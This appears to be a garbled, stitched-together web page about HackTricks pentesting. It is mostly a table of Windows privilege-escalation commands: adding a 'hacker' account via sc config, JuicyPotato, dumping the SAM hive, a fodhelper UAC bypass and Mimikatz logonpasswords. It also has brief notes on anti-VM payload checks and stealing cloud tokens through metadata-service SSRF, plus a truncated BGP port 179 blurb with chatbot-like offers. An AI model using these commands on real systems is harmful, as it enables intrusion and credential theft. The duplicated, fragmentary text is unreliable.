Post-engagement cleanup and attestations - Provide confirmation of artifact removal and account deactivation.
| # | Trick | Command / Technique | |---|-------|----------------------| | 31 | AlwaysInstallElevated MSI | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer | | 32 | Unquoted service paths | wmic service get name,displayname,pathname,startmode | | 33 | Weak service permissions (sc.exe) | sc config SERVICE binpath="cmd.exe /c net user hacker pass /add" | | 34 | SeImpersonate (Potato家族) | JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" | | 35 | Saved RDP credentials | cmdkey /list → runas /savecred | | 36 | SAM & SYSTEM backup | reg save hklm\sam sam.save | | 37 | Writable %PATH% folders | where.exe check + drop whoami.exe | | 38 | PrintNightmare (CVE-2021-34527) | MS-RPRN → SharpPrintNightmare.exe | | 39 | UAC bypass – fodhelper | reg add HKCU\Software\Classes\ms-settings\shell\open\command | | 40 | Logon scripts from registry | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" | | ... | ... | ... | | 60 | Mimikatz sekurlsa | sekurlsa::logonpasswords |
Anti-VM and sandbox detection in payloads - Detect virtualization artifacts before payload activation. hacktricks 179 best
Metadata service SSRF to steal credentials (AWS/GCP) - Target 169.254.169.254 for AWS; craft SSRF payloads to retrieve tokens.
Covert channels using ICMP, HTTP, or DNS Covert channels using ICMP, HTTP, or DNS In
In the cybersecurity community, "HackTricks 179" typically refers to the pentesting methodology for , which is the default port for the Border Gateway Protocol (BGP) . HackTricks is a widely used knowledge base that documents vulnerabilities and exploitation techniques for various network services. Securing the Backbone: Pentesting Port 179 (BGP)
Port 179 is used by BGP to establish "peering" sessions between —large networks like ISPs and tech giants—to share routing tables. Protocol: TCP (Transmission Control Protocol). web fuzzing). Just let me know.
If you meant a from HackTricks, I can provide a summary of common favorites (e.g., Linux privesc, Windows enumeration, AD attacks, web fuzzing). Just let me know.